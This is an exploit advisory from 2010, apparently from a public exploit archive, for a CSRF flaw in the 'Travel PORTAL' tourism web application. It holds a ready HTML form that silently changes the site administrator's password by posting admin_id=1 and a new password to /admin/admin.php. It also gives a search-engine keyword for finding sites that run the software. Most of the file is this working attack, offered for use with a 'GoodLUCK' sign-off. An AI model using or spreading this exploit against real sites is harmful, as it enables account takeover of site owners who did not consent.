50 lines
No EOL
1.6 KiB
HTML
50 lines
No EOL
1.6 KiB
HTML
=====================================================
|
|
Travel PORTAL <= Admin Password Change (CSRF) Exploit
|
|
=====================================================
|
|
|
|
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
[+] Author : KnocKout
|
|
[~] Contact : knockoutr@msn.com
|
|
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
|~Web App. : Travel PORTAL
|
|
|~Price : 299 Euro :)
|
|
|~Version : N/A
|
|
|~Software: http://www.tourismscripts.com
|
|
|~Vulnerability Style : CSRF
|
|
|~Vulnerability Dir : /admin
|
|
|~Google Keyword : "For Owners, Agents, Hotels, Hostels, Guest House "
|
|
|[~]Date : "18.10.2010"
|
|
|[~]Tested on : (L):Vista (R):Demos.
|
|
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
############################################################
|
|
the target can be changed according to
|
|
<form method="post" action="http://VICTIM/admin/admin.php">
|
|
############################################################
|
|
|
|
~~~~~~~~ Explotation| Exploit.HTML~~~~~~~~~~~
|
|
|
|
========(CSRF) Html Exploit=========
|
|
|
|
<title>Exploited by KnocKout</title>
|
|
</table>
|
|
<br>
|
|
<h3>Travel Portal - Remote Admin Password Change (CSRF) Exploited by KnocKout</h3>
|
|
<table>
|
|
|
|
<tr>
|
|
<form method="post" action="http://server/admin/admin.php">
|
|
<input type="hidden" name="admin_id" value="1">
|
|
<td align=right>Admin Name:</td><td align=left>admin<td>
|
|
</tr>
|
|
<tr>
|
|
<td align=right>New Password:</td><td align=left><input type="password" name="password" size="40" maxlength="40" ><td>
|
|
</tr>
|
|
<tr>
|
|
<td></td><td><input type="submit" name="submit" value="Update Password"></td>
|
|
</form>
|
|
</tr>
|
|
</table>
|
|
|
|
========(CSRF) Html Exploit=========
|
|
|
|
GoodLUCK. |